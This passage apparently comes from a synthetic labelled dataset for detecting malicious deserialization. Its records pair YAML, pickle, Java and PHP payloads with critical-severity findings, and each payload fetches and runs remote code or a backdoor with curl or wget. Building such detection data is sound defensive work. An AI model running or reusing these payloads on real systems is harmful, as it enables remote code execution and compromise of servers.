bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://37.217.7.205/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://131.25.226.12/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://37.217.7.205/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00043", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://27.108.192.187/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://93.207.142.238/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://27.108.192.187/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://93.207.142.238/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00044", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('jb4Xqt85Jf78zTwN/TR6ijz7wXClxzQ1+jzx/dl3dM9yKUzj8dYCDIQ/KZTK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://145.158.20.110/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('jb4Xqt85Jf78zTwN/TR6ijz7wXClxzQ1+jzx/dl3dM9yKUzj8dYCDIQ/KZTK')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00045", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://147.182.61.243/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://147.182.61.243/shell\")"}}]} {"id": "synth_malicious_deserialization_00046", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:50:\"8CoG/u3suBYt9Gi3IRo4cTa3GX0qgS5fkWaiR33q\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://118.72.72.71/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:50:\"8CoG/u3suBYt9Gi3IRo4cTa3GX0qgS5fkWaiR33q\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://118.72.72.71/bd\")"}}]} {"id": "synth_malicious_deserialization_00047", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:28:\"Bqw99w8ubnJJckQFmdKnH09RowbucpncAa2RWR9m\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://225.219.96.12/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:28:\"Bqw99w8ubnJJckQFmdKnH09RowbucpncAa2RWR9m\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://225.219.96.12/bd\")"}}]} {"id": "synth_malicious_deserialization_00048", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://202.27.136.229/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://202.27.136.229/shell\")"}}]} {"id": "synth_malicious_deserialization_00049", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://80.228.57.162/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://192.242.83.146/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://80.228.57.162/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://192.242.83.146/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00050", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://243.31.233.194/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://103.47.252.67/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://243.31.233.194/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://103.47.252.67/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00051", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://251.209.68.72/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://251.209.68.72/shell\")"}}]} {"id": "synth_malicious_deserialization_00052", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://234.68.98.98/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://234.68.98.98/shell\")"}}]} {"id": "synth_malicious_deserialization_00053", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('aBTaE41bBoSJ6tE8NhFvGVCjynz05B3XUovXjK6BI2l24i31I/5rK9W5RxZT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://243.242.43.66/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('aBTaE41bBoSJ6tE8NhFvGVCjynz05B3XUovXjK6BI2l24i31I/5rK9W5RxZT')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00054", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('L80q5WQXFOAYYdgr7Gf34PvmBogmx3GGLYGCAscM+MNjYWbqr9kWtwrU3VwD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://152.218.203.39/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('L80q5WQXFOAYYdgr7Gf34PvmBogmx3GGLYGCAscM+MNjYWbqr9kWtwrU3VwD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00055", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('n3naRTml9Iit879YgB4MRlHiySYLlH9qh26AmQgQSJCiir+3Y4Nqhz+PWOUc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://207.60.177.113/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('n3naRTml9Iit879YgB4MRlHiySYLlH9qh26AmQgQSJCiir+3Y4Nqhz+PWOUc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00056", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://107.223.247.33/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://107.223.247.33/shell\")"}}]} {"id": "synth_malicious_deserialization_00057", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://207.230.247.209/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.23.215.68/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://207.230.247.209/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.23.215.68/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00058", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('NRHN3uC4q7oBTrkJLwXJfYnnNpyuK3B4RcQhdW0jNcjCb/vNnTlAmTMf1FhD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://248.154.124.161/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('NRHN3uC4q7oBTrkJLwXJfYnnNpyuK3B4RcQhdW0jNcjCb/vNnTlAmTMf1FhD')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00059", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://168.122.127.193/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.100.76.203/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://168.122.127.193/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://153.100.76.203/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00060", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://55.209.237.148/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://55.209.237.148/shell\")"}}]} {"id": "synth_malicious_deserialization_00061", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://191.6.224.54/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://191.6.224.54/shell\")"}}]} {"id": "synth_malicious_deserialization_00062", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('2TiA410ih9+Zgmma4GSMNhRrVJlry2p1hp/Mrh1Tu+hwEhrgaAmXNO/rTWti')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://182.248.37.137/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2TiA410ih9+Zgmma4GSMNhRrVJlry2p1hp/Mrh1Tu+hwEhrgaAmXNO/rTWti')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00063", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('Xny2dfWJaXTkxbb2tVIjC6PZkSScm+4OEzdggRGwfpwoMUymI+1dlSpGPG/1')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://202.104.195.21/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Xny2dfWJaXTkxbb2tVIjC6PZkSScm+4OEzdggRGwfpwoMUymI+1dlSpGPG/1')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00064", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://155.231.116.149/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.92.175.250/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://155.231.116.149/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.92.175.250/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00065", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"P/x4WwtU640SM/bT+0SRWfu8389iOanwVIW2WvRa\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://149.26.56.145/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"P/x4WwtU640SM/bT+0SRWfu8389iOanwVIW2WvRa\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://149.26.56.145/bd\")"}}]} {"id": "synth_malicious_deserialization_00066", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://169.137.182.115/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://168.113.144.56/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://169.137.182.115/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://168.113.144.56/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00067", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://180.228.243.185/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://180.228.243.185/shell\")"}}]} {"id": "synth_malicious_deserialization_00068", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('ufWBHY8RsoNvY+XjQsmCidyjZdmuaUKMRtIgeaLJaADRhRtSeolLFbfIN/8t')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://142.213.91.110/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('ufWBHY8RsoNvY+XjQsmCidyjZdmuaUKMRtIgeaLJaADRhRtSeolLFbfIN/8t')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00069", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('yNAnXi/GGRmGiYY05+RaidcwEI4W2iUHvs/212dkGlgRd3trjGqQzEIMHidP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://203.6.89.246/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('yNAnXi/GGRmGiYY05+RaidcwEI4W2iUHvs/212dkGlgRd3trjGqQzEIMHidP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00070", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://204.21.199.69/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://239.87.65.58/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://204.21.199.69/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://239.87.65.58/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00071", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:80:\"o3E0jLB91xi1B5wWtivJwPPbde9kCLKoYLilz7Oa\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://69.203.56.108/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:80:\"o3E0jLB91xi1B5wWtivJwPPbde9kCLKoYLilz7Oa\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://69.203.56.108/bd\")"}}]} {"id": "synth_malicious_deserialization_00072", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('HBg7M0BVKVTFEjAO8M9gc3BrwfZ4gknxN5sFK2+0ThY0MCGyjGdJCz8blN6o')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://149.168.99.58/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('HBg7M0BVKVTFEjAO8M9gc3BrwfZ4gknxN5sFK2+0ThY0MCGyjGdJCz8blN6o')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00073", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:50:\"mVW+jM2hgLaHZZcqQIXcQNK4aX2aILzQad/jri8K\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://79.20.176.192/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:50:\"mVW+jM2hgLaHZZcqQIXcQNK4aX2aILzQad/jri8K\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://79.20.176.192/bd\")"}}]} {"id": "synth_malicious_deserialization_00074", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('IaVKrEHf/D2r+60CSz1JS8Yyg7WHhuiQs17xFNag94wxjmydB9kfBZHUwC7w')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://147.95.50.59/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('IaVKrEHf/D2r+60CSz1JS8Yyg7WHhuiQs17xFNag94wxjmydB9kfBZHUwC7w')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00075", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://134.126.16.43/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://251.171.206.253/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://134.126.16.43/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://251.171.206.253/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00076", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:70:\"WyLgoy3dpwlrz/coHd5d9hwwS9AmEauLgXV9WyUO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://78.73.194.52/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:70:\"WyLgoy3dpwlrz/coHd5d9hwwS9AmEauLgXV9WyUO\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://78.73.194.52/bd\")"}}]} {"id": "synth_malicious_deserialization_00077", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('fZUNMJqRU9ZU2Uxw7TNxhe7G6HxI+p9THrt0F341w5wSDU3eFPGwxpqGELKp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://248.249.173.213/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('fZUNMJqRU9ZU2Uxw7TNxhe7G6HxI+p9THrt0F341w5wSDU3eFPGwxpqGELKp')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00078", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:21:\"guH8ocVTOpVycRZhL43zjY1jAP97bixPwv8U7uYW\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://87.140.56.53/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:21:\"guH8ocVTOpVycRZhL43zjY1jAP97bixPwv8U7uYW\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://87.140.56.53/bd\")"}}]} {"id": "synth_malicious_deserialization_00079", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://76.95.226.153/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://196.6.71.53/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://76.95.226.153/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://196.6.71.53/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00080", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://200.63.126.166/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://200.63.126.166/shell\")"}}]} {"id": "synth_malicious_deserialization_00081", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://166.1.1.142/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://166.1.1.142/shell\")"}}]} {"id": "synth_malicious_deserialization_00082", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"SJYJeYjJaaYwswxvEUI4ncs6kZCyQcgUKigTQqG9\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://200.183.87.3/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"SJYJeYjJaaYwswxvEUI4ncs6kZCyQcgUKigTQqG9\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://200.183.87.3/bd\")"}}]} {"id": "synth_malicious_deserialization_00083", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:63:\"2gM8fKL6353hzyrFUTv74/V30F3Tw2ToWWOUM8u4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://142.38.134.90/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:63:\"2gM8fKL6353hzyrFUTv74/V30F3Tw2ToWWOUM8u4\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://142.38.134.90/bd\")"}}]} {"id": "synth_malicious_deserialization_00084", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://214.219.65.217/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://71.36.38.33/backdoor', '-O', 